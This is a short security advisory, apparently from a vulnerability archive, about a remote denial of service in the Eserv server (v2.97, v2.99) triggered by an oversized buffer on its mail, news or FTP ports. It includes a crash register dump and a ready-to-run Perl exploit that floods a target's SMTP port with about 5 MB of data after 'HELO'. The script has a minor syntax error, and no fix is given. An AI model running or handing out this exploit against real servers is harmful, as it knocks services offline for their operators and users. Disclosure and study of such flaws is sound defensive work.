COMMAND

	Eserv remote denial of service

SYSTEMS AFFECTED

	Eserv  versions  tested:  v2.97,  v2.99  (possible   all   version   are
	vulnerable)

PROBLEM

	Thanks to securma massine advisory :
	
	Eserv is vulnerable has an attack back by sending  a  buffer  of  5M  of
	Data with port 119 or 25 or 110 or 21 with a buffer of  5080000  byte  ,
	one has the following error:
	
	 l'insruction a "0x0000fde8" emploie l'adresse
	 memoire "0x0000fde8" la memoire e peut pas etre "read"
	
	the state of the registers is:
	
	eax=c0000000 ebx=004c3ed5 ecx=0000fde8 edx=002f0608
	esi=004fc17e edi=003bb358
	eip=0000fde8 esp=0189efa4 ebp=0189ff54 iopl=0 nv up
	ei pl nz ac pe nc
	cs=001b ss=0023 ds=0023 es=0023 fs=0038
	gs=0000 efl=00000212
	0000fde8 ?? ???
	
	while adding a few bytes to the buffer the programe  falls  without  any
	message
	
	 Exploit:
	 ========
	
	#!/usr/bin/perl -w
	#greetz: marocit
	#tool Eserv_dos.pl
	use IO::Socket;
	$buffer = "A"x 5080000 ;
	$hel = "HELO "
	$connect = IO::Socket::INET ->new (Proto=>"tcp",
	PeerAddr=> "$ARGV[0]",
	PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV
	[0]" }
	print $connect "$hel$buffer";
	print "\nsending exploit......\n\n";
	

SOLUTION

	?